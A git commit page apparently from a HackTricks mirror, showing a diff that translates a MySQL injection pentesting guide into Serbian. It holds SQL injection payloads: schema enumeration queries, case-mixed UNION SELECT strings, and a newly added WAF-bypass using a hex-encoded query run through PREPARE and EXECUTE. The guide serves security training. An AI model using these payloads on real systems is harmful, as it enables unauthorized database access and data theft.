mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-12 14:22:56 +00:00
Translated ['pentesting-web/sql-injection/mysql-injection/README.md'] to
This commit is contained in:
parent
e936cb58fc
commit
17b598f15a
1 changed files with 19 additions and 11 deletions
|
@ -1,16 +1,16 @@
|
||||||
# MySQL injection
|
# MySQL injection
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary>Support HackTricks</summary>
|
<summary>Podržite HackTricks</summary>
|
||||||
|
|
||||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
@ -21,7 +21,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
|
||||||
|
|
||||||
{% embed url="https://www.rootedcon.com/" %}
|
{% embed url="https://www.rootedcon.com/" %}
|
||||||
|
|
||||||
## Comments
|
## Komentari
|
||||||
```sql
|
```sql
|
||||||
-- MYSQL Comment
|
-- MYSQL Comment
|
||||||
# MYSQL Comment
|
# MYSQL Comment
|
||||||
|
@ -69,7 +69,7 @@ from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/]
|
||||||
|
|
||||||
## Tok
|
## Tok
|
||||||
|
|
||||||
Zapamtite da u "modernim" verzijama **MySQL** možete zameniti "_**information\_schema.tables**_" sa "_**mysql.innodb\_table\_stats**_**"** (Ovo može biti korisno za zaobilaženje WAF-ova).
|
Zapamtite da u "modernim" verzijama **MySQL** možete zameniti "_**information\_schema.tables**_" za "_**mysql.innodb\_table\_stats**_**"** (Ovo može biti korisno za zaobilaženje WAF-ova).
|
||||||
```sql
|
```sql
|
||||||
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
|
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
|
||||||
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
|
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
|
||||||
|
@ -122,7 +122,15 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||||
|
|
||||||
## WAF bypass trikovi
|
## WAF bypass trikovi
|
||||||
|
|
||||||
### Alternatives to information\_schema
|
### Izvršavanje upita kroz Pripremljene Izjave
|
||||||
|
|
||||||
|
Kada su složeni upiti dozvoljeni, može biti moguće zaobići WAF-ove dodeljivanjem heksadecimalne reprezentacije upita koji želite da izvršite (koristeći SET) varijabli, a zatim koristiti PREPARE i EXECUTE MySQL izjave da konačno izvršite upit. Nešto poput ovoga:
|
||||||
|
```
|
||||||
|
0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
|
||||||
|
```
|
||||||
|
Za više informacija, molimo vas da se obratite [ovom blog postu](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce).
|
||||||
|
|
||||||
|
### Information\_schema alternatives
|
||||||
|
|
||||||
Zapamtite da u "modernim" verzijama **MySQL** možete zameniti _**information\_schema.tables**_ sa _**mysql.innodb\_table\_stats**_ ili sa _**sys.x$schema\_flattened\_keys**_ ili sa **sys.schema\_table\_statistics**
|
Zapamtite da u "modernim" verzijama **MySQL** možete zameniti _**information\_schema.tables**_ sa _**mysql.innodb\_table\_stats**_ ili sa _**sys.x$schema\_flattened\_keys**_ ili sa **sys.schema\_table\_statistics**
|
||||||
|
|
||||||
|
@ -134,7 +142,7 @@ Izaberite 2 kolone bez korišćenja bilo kakvog zareza ([https://security.stacke
|
||||||
```
|
```
|
||||||
### Preuzimanje vrednosti bez imena kolone
|
### Preuzimanje vrednosti bez imena kolone
|
||||||
|
|
||||||
Ako u nekom trenutku znate ime tabele, ali ne znate imena kolona unutar tabele, možete pokušati da saznate koliko kolona ima izvršavajući nešto poput:
|
Ako u nekom trenutku znate ime tabele, ali ne znate imena kolona unutar tabele, možete pokušati da saznate koliko kolona ima izvršavanjem nečega poput:
|
||||||
```bash
|
```bash
|
||||||
# When a True is returned, you have found the number of columns
|
# When a True is returned, you have found the number of columns
|
||||||
select (select "", "") = (SELECT * from demo limit 1); # 2columns
|
select (select "", "") = (SELECT * from demo limit 1); # 2columns
|
||||||
|
@ -167,7 +175,7 @@ mysql> select version();
|
||||||
|
|
||||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
[**RootedCON**](https://www.rootedcon.com/) je najrelevantnija sajber bezbednosna manifestacija u **Španiji** i jedna od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je vrelo okupljalište za profesionalce u tehnologiji i sajber bezbednosti u svakoj disciplini.
|
[**RootedCON**](https://www.rootedcon.com/) je najrelevantnija sajber bezbednosna manifestacija u **Španiji** i jedna od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je vrelo mesto okupljanja za profesionalce u tehnologiji i sajber bezbednosti u svakoj disciplini.
|
||||||
|
|
||||||
{% embed url="https://www.rootedcon.com/" %}
|
{% embed url="https://www.rootedcon.com/" %}
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue